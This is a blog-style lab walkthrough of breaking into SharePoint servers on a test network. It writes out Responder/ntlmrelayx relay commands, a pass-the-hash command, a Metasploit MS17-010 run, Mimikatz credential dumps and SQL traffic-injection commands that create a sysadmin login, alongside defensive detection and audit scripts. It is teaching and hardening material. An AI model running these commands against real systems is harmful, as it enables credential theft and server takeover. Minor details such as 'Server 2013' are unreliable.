A few days ago I had an idea: I wanted to see if I could get into a SharePoint environment without credentials. The idea behind this was to educate the public and help them protect themselves from the vulnerabilities I exploited. Over the course of the next few weeks I am going to release a number of ways to hack SharePoint and to protect SharePoint. Keep your eyes on our blog and be the first in line to get the latest release.

So, how was it done?

I have set up a little network with a DC, SQL and SharePoint 2013/2016/2019 and am going to try to hack onto the SharePoint servers from a Kali machine on the same network. The idea behind this is to showcase why it is so important to harden your SharePoint installation: it is the one place the entire business keeps all its information, and if that information is removed, or breached and sold to competitors, or hit by ransomware, how much of an effect would that have on the business?

All servers have been installed using default settings; there is a mixture of Windows Server 2012/2016/2019. I have one user PC on Windows 10, again with default settings.

I am also using VirtualBox just because it is FREE and easy to use, and I love that I can copy and paste between consoles.


Okay, so let’s pretend my Kali box got access via VPN, wireless or LAN cable and now needs to discover what is going on in this new network. From DHCP I can see my IP is 192.168.137.10. So the first thing I am going to do is scan the network and see what I can find.

After a quick Zenmap scan (because it is easier on the eyes than plain old NMAP), I can see a few servers and a few open ports.

The scan I ran was

nmap -p- -T3 -A -Pn 192.168.137.1/24

-p- = Scan all ports. By default nmap only scans the top 1000, and I want to find the port Central Administration is running on, which most of the time is randomized.

-T3 = Speed at which the scan takes place. The default is T4, which is usually caught by firewalls, so I wanted to slow it down; you can still go down to T2 and T1 if needed.

-A = Detect OS and services.

-Pn = Treat the host as up and scan it even if it does not answer ping, in case it is trying to hide.

I have found the following servers:

DC = 192.168.137.1

SQL = 192.168.137.2

SharePoint 2019 = 192.168.137.3

SharePoint 2016 = 192.168.137.10

SharePoint 2013 = 192.168.137.14

NetBIOS and LLMNR Name Poisoning

My first attack is to check whether I can use Responder and dump some hashes. Responder does exactly that: it watches the network for requests for an SMB resource, claims to be that resource and grabs the NTLM hash from the pass-through authentication.

Administrator::KRAKEN:8fbf2292b11d4d

OK, great, we got a hash, but this hash is very long and looks a bit strange, you might say, and you are correct: in fact it is a Net-NTLMv2 hash, which cannot be used in pass the hash.

  • You CAN perform Pass-The-Hash attacks with NTLM hashes.
  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.

We can, however, crack Net-NTLM hashes with Hashcat, so we can send that hash over to our Hashcat server and let it run.
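To make the difference between those two bullet points concrete, here is an added example (my code, not part of the original post) that classifies the material a line contains and reproduces the Net-NTLMv2 response computation from MS-NLMP exactly as the verifying server does it. The NT hash, server challenges and client blob in it are constructed values; the one LM:NT pair it classifies is the one the post passes to pth-winexe later. Running it shows that NTProofStr is an HMAC over the server's own challenge, which is why a Responder capture can only be cracked offline against password guesses and never replayed as-is, while a stored NT hash stands in for the password directly.

```python
"""Classify captured NTLM material and show why a Net-NTLMv2 capture is tied to one
challenge. Added example, not from the original post: the NT hash, challenges and
blob below are constructed, and the response computation follows MS-NLMP as
understood here. Nothing touches a network.
"""
import hashlib
import hmac
import re
from typing import Dict

HEX = r"[0-9a-fA-F]"

# Constructed inputs for the demonstration (the NT hash is not a real account's).
USER, DOMAIN = "Administrator", "KRAKEN"
NT_HASH = bytes.fromhex("0123456789abcdef0123456789abcdef")
CHALLENGE_A = bytes.fromhex("a1a2a3a4a5a6a7a8")   # 8-byte server challenge, one server
CHALLENGE_B = bytes.fromhex("b1b2b3b4b5b6b7b8")   # a different server's challenge
BLOB = (b"\x01\x01" + b"\x00" * 6                  # NTLMv2_CLIENT_CHALLENGE header
        + bytes.fromhex("0080d3e6a6c0d501")        # timestamp (constructed FILETIME)
        + bytes.fromhex("1122334455667788")        # client challenge
        + b"\x00" * 4
        + b"\x02\x00" + (12).to_bytes(2, "little") + "KRAKEN".encode("utf-16-le")  # MsvAvNbDomainName
        + b"\x00" * 4)                             # MsvAvEOL


def classify(material: str) -> str:
    """Name the kind of NTLM material on a line.

    'NTLM'       LM:NT hash pair as dumped from the SAM (32 hex digits each)
    'Net-NTLMv1' user::domain:lmresp(48):ntresp(48):challenge(16), the Responder layout
    'Net-NTLMv2' user::domain:serverchallenge(16):ntproofstr(32):blob, the Responder layout
    """
    m = material.strip()
    if re.fullmatch(rf"{HEX}{{32}}:{HEX}{{32}}", m):
        return "NTLM"
    if re.fullmatch(rf"[^:]+::[^:]*:{HEX}{{48}}:{HEX}{{48}}:{HEX}{{16}}", m):
        return "Net-NTLMv1"
    if re.fullmatch(rf"[^:]+::[^:]*:{HEX}{{16}}:{HEX}{{32}}:{HEX}+", m):
        return "Net-NTLMv2"
    return "unknown"


def pass_the_hash_possible(kind: str) -> bool:
    """Only the stored NT hash stands in for the password; a challenge-response does not."""
    return kind == "NTLM"


def parse_net_ntlmv2(line: str) -> Dict[str, str]:
    """Split a Responder-style Net-NTLMv2 line into its fields."""
    user, _, domain, challenge, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "server_challenge": challenge,
            "ntproofstr": proof, "blob": blob}


def ntlmv2_proof(nt_hash: bytes, user: str, domain: str,
                 server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr as the verifying server recomputes it (MS-NLMP, NTLM v2 authentication)."""
    # NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))
    ntowf_v2 = hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    # NTProofStr = HMAC-MD5(NTOWFv2, server challenge || client blob)
    return hmac.new(ntowf_v2, server_challenge + blob, hashlib.md5).digest()


def responder_line(user: str, domain: str, nt_hash: bytes,
                   server_challenge: bytes, blob: bytes) -> str:
    """Render an exchange in the format Responder prints."""
    proof = ntlmv2_proof(nt_hash, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def replay_is_bound_to_challenge() -> bool:
    """Same account, same NT hash, same blob, a different server challenge: the
    proof changes, so a captured line cannot be replayed to another server."""
    a = parse_net_ntlmv2(responder_line(USER, DOMAIN, NT_HASH, CHALLENGE_A, BLOB))
    b = parse_net_ntlmv2(responder_line(USER, DOMAIN, NT_HASH, CHALLENGE_B, BLOB))
    return a["ntproofstr"] != b["ntproofstr"]


if __name__ == "__main__":
    # First sample is the LM:NT pair the post hands to pth-winexe; second is a constructed capture.
    for sample in ("aad3b435b51404eeaad3b435b51404ee:76e05d963ccf2270fb610efb8d905ccb",
                   responder_line(USER, DOMAIN, NT_HASH, CHALLENGE_A, BLOB)):
        kind = classify(sample)
        print(f"{kind:11} pass-the-hash: {pass_the_hash_possible(kind)}  {sample[:60]}...")
    print("bound to challenge:", replay_is_bound_to_challenge())
```

The LM half of that pair (aad3b435...) is the well-known value for an empty LM hash, which is why only the NT half matters for pass the hash; the MD4 step that turns a password into the NT hash is left out here so the script runs on builds of Python whose OpenSSL no longer ships MD4.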

Relay attacks

While that Net-NTLM Hashcat crack is running we can perform a relay attack.

Fire up Responder again, but this time go to Responder.conf and make sure HTTP and SMB are turned off.

Start up Responder with this command

python Responder.py -I eth0 -rdw

and in another window fire up NTLMRelayx with this command

python ntlmrelayx.py -tf targets.txt -smb2support

With a little bit of patience and some network activity, you should be able to dump some SAM files and get those HASHES!

Now that we have a pass-the-hash scenario we don’t even need to crack the password; we can simply pass the hash to log in to any server.

pth-winexe -U Kraken/Administrator%aad3b435b51404eeaad3b435b51404ee:76e05d963ccf2270fb610efb8d905ccb //192.168.137.14 cmd.exe

And then I can create a user

And then add that user to the Administrators group

We could have also used xfreerdp to pth as administrator and logged in, but for some reason I couldn’t get it to work just now so I found an alternative route to keep this blog moving forward.

So now I can jump on the box using any old RDP tool.

And because local admins have access to SharePoint Central Administration, we are able to get access.

From here I could create a domain user instead of a local user and then pwn all the SharePoint boxes if I needed to, but you get the idea.
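From the defender's side, the chain above leaves a very recognisable trail in the Security log of the box that was logged into. The following added example (not from the original post) correlates constructed 4624/4720/4732 events the way a SIEM rule would: an NTLM network logon whose workstation name and source address do not agree with an assumed inventory, and an account created and added to Administrators by that same logon session within a few minutes. Event field names follow the Security log XML; the inventory, IP addresses and account names are assumptions.

```python
"""Detect the logon chain from the post in Windows Security events: an NTLM network
logon (4624, logon type 3) followed by an account being created (4720) and added to
the local Administrators group (4732) by that same session.

Added example, not from the original post. The events are constructed; field names
follow the Security log XML. The inventory of computers and addresses is an
assumption for the demo.
"""
from datetime import datetime, timedelta
from typing import Dict, List

WINDOW = timedelta(minutes=10)

# Assumed inventory: the address each domain computer is expected to log on from.
INVENTORY = {"DC": "192.168.137.1", "SQL": "192.168.137.2", "SP2019": "192.168.137.3",
             "SP2016": "192.168.137.10", "SP2013": "192.168.137.14"}

EVENTS: List[Dict] = [
    # NTLM network logon as Administrator from a workstation the inventory does not know
    {"EventID": 4624, "Time": "2020-03-01T10:00:05", "Computer": "SP2013",
     "TargetUserName": "Administrator", "TargetLogonId": "0x3e7a1", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "WorkstationName": "KALI",
     "IpAddress": "192.168.137.20"},
    # the same logon session creates a user and adds it to Administrators
    {"EventID": 4720, "Time": "2020-03-01T10:01:10", "Computer": "SP2013",
     "SubjectUserName": "Administrator", "SubjectLogonId": "0x3e7a1",
     "TargetUserName": "newadmin"},
    {"EventID": 4732, "Time": "2020-03-01T10:01:30", "Computer": "SP2013",
     "SubjectUserName": "Administrator", "SubjectLogonId": "0x3e7a1",
     "TargetUserName": "Administrators", "MemberName": "SP2013\\newadmin"},
    # benign: the farm account reaching SQL from the SharePoint 2013 server, nothing after it
    {"EventID": 4624, "Time": "2020-03-01T11:00:00", "Computer": "SQL",
     "TargetUserName": "sp2013.service", "TargetLogonId": "0x5c10", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "WorkstationName": "SP2013",
     "IpAddress": "192.168.137.14"},
]


def _when(event: Dict) -> datetime:
    return datetime.fromisoformat(event["Time"])


def ntlm_network_logons(events: List[Dict]) -> List[Dict]:
    """4624 events for NTLM logons that arrived over the network (logon type 3)."""
    return [e for e in events if e["EventID"] == 4624 and e["LogonType"] == 3
            and e.get("AuthenticationPackageName") == "NTLM"]


def source_mismatches(events: List[Dict], inventory: Dict[str, str] = INVENTORY) -> List[Dict]:
    """NTLM network logons whose claimed workstation is unknown, or is known but
    arrives from the wrong address. A relayed logon carries the victim's workstation
    name but the relay box's IP; a pass-the-hash tool presents its own host name."""
    findings = []
    for e in ntlm_network_logons(events):
        expected = inventory.get(e["WorkstationName"])
        if expected is None:
            reason = f"unknown workstation {e['WorkstationName']}"
        elif expected != e["IpAddress"]:
            reason = f"{e['WorkstationName']} expected from {expected}"
        else:
            continue
        findings.append({"computer": e["Computer"], "user": e["TargetUserName"],
                         "ip": e["IpAddress"], "reason": reason})
    return findings


def persistence_after_ntlm_logon(events: List[Dict], window: timedelta = WINDOW) -> List[Dict]:
    """Account creation (4720) or Administrators membership change (4732) carried
    out by a session that began with an NTLM network logon inside the window.
    Correlation is on the logon ID rather than the user name."""
    alerts = []
    for logon in ntlm_network_logons(events):
        actions = [e for e in events
                   if e["EventID"] in (4720, 4732) and e["Computer"] == logon["Computer"]
                   and e.get("SubjectLogonId") == logon["TargetLogonId"]
                   and timedelta(0) <= _when(e) - _when(logon) <= window]
        if actions:
            alerts.append({"computer": logon["Computer"], "user": logon["TargetUserName"],
                           "source": logon["IpAddress"],
                           "actions": [(e["EventID"], e.get("MemberName", e["TargetUserName"]))
                                       for e in actions]})
    return alerts


if __name__ == "__main__":
    for finding in source_mismatches(EVENTS):
        print("logon source mismatch:", finding)
    for alert in persistence_after_ntlm_logon(EVENTS):
        print("persistence after NTLM logon:", alert)
```

Feed it real events exported with Get-WinEvent or a forwarded-log pipeline and the same two functions apply. Requiring SMB signing on the servers breaks the relay itself, and turning off LLMNR and NetBIOS name resolution removes the poisoning step that feeds it; the correlation stays useful for the pass-the-hash path, which needs neither.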

MS17-010

EternalBlue and other exploits on port 445 are still common, believe it or not, especially on older servers like Server 2013/2008/2003.

Let’s have a quick check to see if any of the servers on our network are vulnerable.

Nothing at the moment, because they have all been patched, but let me reverse a patch on the 2013 server just to show you how this hack works. In my local policies I change the following settings.

Then, running the check again, I can see it is now ready for exploitation.

A quick check with the zzz_exploit.py script and we can see the target is most certainly vulnerable.

One pwned.txt file found.

So we fire up msfconsole and run ‘use windows/smb/ms17_010_psexec’, set RHOSTS to 192.168.137.14 and run it.

We now pretty much have pwned that box and can do whatever we like.

Now I load kiwi and run

lsa_dump_secrets

And

lsa_dump_sam

Now I have NTLM hashes to crack, actual passwords to use and of course I can run commands to make myself a user and then, again, get access like before.

*There are a ton more ways to use Meterpreter, Mimikatz and Kiwi here; the point is not to show all of them but to hack the SharePoint box. We have successfully done this here, so it’s time to move on. I have left some links in the references section for you to check out if you want to learn more.

Fix this by checking whether you are patched here:

https://support.microsoft.com/en-za/help/4023262/how-to-verify-that-ms17-010-is-installed

Sniffing

Firing up bettercap allows me to capture network traffic.

By simply switching net.sniff on I can capture Net-NTLM handshakes to crack.

But what else can we sniff? Let’s fire up Wireshark and filter on tds.query.

After watching for a while, I noticed the following string was being processed periodically.

GRANT EXECUTE ON [proc_GetMonitoredScope] TO [KRAKEN\sp2013.service]

If I then use ./sqlinject.sh I can swap out the command and create my own user instead.

./sqlinject.sh -o "GRANT EXECUTE ON [proc_GetCorrelationIdAndUsers] TO [KRAKEN\sp2013.service]" -i "CREATE LOGIN GTconsult WITH PASSWORD='P@ssw0rd'" -s 192.168.137.2 -c 192.168.137.14 -f mssql.filter

./sqlinject.sh -o "GRANT EXECUTE ON [proc_GetCorrelationIdAndUsers] TO [KRAKEN\sp2013.service]" -i "ALTER SERVER ROLE sysadmin ADD MEMBER GTconsult;" -s 192.168.137.2 -c 192.168.137.14 -f mssql.filter

Now I have sysadmin on SQL.

*This was only the case due to a poor SharePoint setup and could have been avoided if ‘sysadmin’ had not been given to the farm account.

We can now download all databases and content and attach them to our farm, or we can start playing with msfconsole and mssql_exec to run commands on the SQL server.
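The reason tds.query shows the statement at all is that the SharePoint-to-SQL session is not encrypted. The added example below (my code, not from the original post) parses TDS packets far enough to read the encryption option from the PRELOGIN handshake and to pull the UTF-16LE statement out of a clear-text SQL_BATCH packet, then flags privileged statements such as the GRANT the farm account sends. Packet layouts follow MS-TDS as I understand it, and the sample packets are built by the script rather than taken from the capture.

```python
"""Audit raw TDS packets the way Wireshark's tds.query filter sees them: the PRELOGIN
exchange says whether the session is going to be encrypted, and any SQL_BATCH packet
that is still parseable as TDS is carrying its statement in clear UTF-16LE text.

Added example, not from the original post. Packet layouts follow MS-TDS as
understood here; the sample packets are built by this script rather than captured.
"""
import struct
from typing import Dict, List

TDS_SQL_BATCH = 0x01
TDS_PRELOGIN = 0x12
ENCRYPTION_OPTION = 0x01
ENCRYPT = {0x00: "ENCRYPT_OFF", 0x01: "ENCRYPT_ON", 0x02: "ENCRYPT_NOT_SUP", 0x03: "ENCRYPT_REQ"}
# Statements that should never be readable on the wire, let alone forgeable.
PRIVILEGED = ("GRANT ", "CREATE LOGIN", "ALTER SERVER ROLE", "ALTER LOGIN", "EXEC XP_CMDSHELL")


def tds_packet(ptype: int, payload: bytes) -> bytes:
    """8-byte TDS header: Type, Status (EOM), Length incl. header, SPID, PacketID, Window."""
    return struct.pack(">BBHHBB", ptype, 0x01, 8 + len(payload), 0, 1, 0) + payload


def build_prelogin(encryption: int) -> bytes:
    """PRELOGIN with a single ENCRYPTION option token (offset/length are big-endian
    and relative to the payload) followed by the 0xFF terminator and the option byte."""
    tokens = struct.pack(">BHH", ENCRYPTION_OPTION, 6, 1) + b"\xff"
    return tds_packet(TDS_PRELOGIN, tokens + bytes([encryption]))


def build_sql_batch(sql: str) -> bytes:
    """SQL_BATCH: ALL_HEADERS (one 18-byte Transaction Descriptor header) then UTF-16LE text."""
    tx_header = struct.pack("<IH", 18, 0x0002) + b"\x00" * 8 + struct.pack("<I", 1)
    all_headers = struct.pack("<I", 4 + len(tx_header)) + tx_header
    return tds_packet(TDS_SQL_BATCH, all_headers + sql.encode("utf-16-le"))


def parse_tds(packet: bytes) -> Dict:
    """Decode the fields this audit needs from one TDS packet."""
    ptype, _status, length, _spid, _pid, _window = struct.unpack(">BBHHBB", packet[:8])
    payload = packet[8:length]
    info: Dict = {"type": ptype}
    if ptype == TDS_PRELOGIN:
        pos = 0
        while payload[pos] != 0xFF:                    # walk option tokens to the terminator
            opt, offset, size = struct.unpack(">BHH", payload[pos:pos + 5])
            if opt == ENCRYPTION_OPTION and size == 1:
                info["encryption"] = ENCRYPT.get(payload[offset], "unknown")
            pos += 5
    elif ptype == TDS_SQL_BATCH:
        headers_len = struct.unpack("<I", payload[:4])[0]
        info["sql"] = payload[headers_len:].decode("utf-16-le")
    return info


def session_encrypted(prelogin: Dict) -> bool:
    """ENCRYPT_ON or ENCRYPT_REQ means the login and every later packet go inside TLS;
    a server with Force Encryption set answers ENCRYPT_REQ."""
    return prelogin.get("encryption") in ("ENCRYPT_ON", "ENCRYPT_REQ")


def audit_capture(packets: List[bytes]) -> Dict:
    """Report the encryption negotiated and every privileged statement seen in clear text."""
    report: Dict = {"encryption": None, "clear_text_privileged": []}
    for packet in packets:
        info = parse_tds(packet)
        if info["type"] == TDS_PRELOGIN:
            report["encryption"] = info.get("encryption")
        elif info["type"] == TDS_SQL_BATCH:
            if info["sql"].lstrip().upper().startswith(PRIVILEGED):
                report["clear_text_privileged"].append(info["sql"])
    return report


# Constructed capture mirroring the post: no encryption, then the GRANT the farm account sends.
CAPTURE_CLEAR = [
    build_prelogin(0x00),
    build_sql_batch("GRANT EXECUTE ON [proc_GetMonitoredScope] TO [KRAKEN\\sp2013.service]"),
    build_sql_batch("SELECT 1"),
]
# What the PRELOGIN looks like once the SQL server has Force Encryption turned on.
CAPTURE_FORCED = [build_prelogin(0x03)]

if __name__ == "__main__":
    print(audit_capture(CAPTURE_CLEAR))
    print(audit_capture(CAPTURE_FORCED))
```

With Force Encryption set on the SQL Server the PRELOGIN answer is ENCRYPT_REQ and nothing after it is parseable as TDS, so the second capture yields no statements at all; that, together with not giving the farm account sysadmin, is what closes off this section's attack.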

Either way, I believe we have sufficiently hacked SharePoint for now. Stay tuned for the next part of the series, where we showcase how to protect against these hacks and defend your SharePoint server.

References

https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa

https://www.youtube.com/watch?v=sAr4PBR7EUE – Responder Usage

https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4 – NTLM hashes explanation

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html – Hashes and more explanations

https://www.offensive-security.com/metasploit-unleashed/mimikatz/ – Mimikatz and Meterpreter

https://community.elearnsecurity.com/topic/2945-hacking-microsoft-sql-server-without-a-password/ – SQLInject.sh with Bettercap

https://www.anitian.com/hacking-microsoft-sql-server-without-a-password/ – SQLInject.sh with Bettercap

https://www.offensive-security.com/metasploit-unleashed/payloads-mssql/ – MSF MSSQL hacks

http://www.fuzzysecurity.com/tutorials/16.html – Privilege Escalation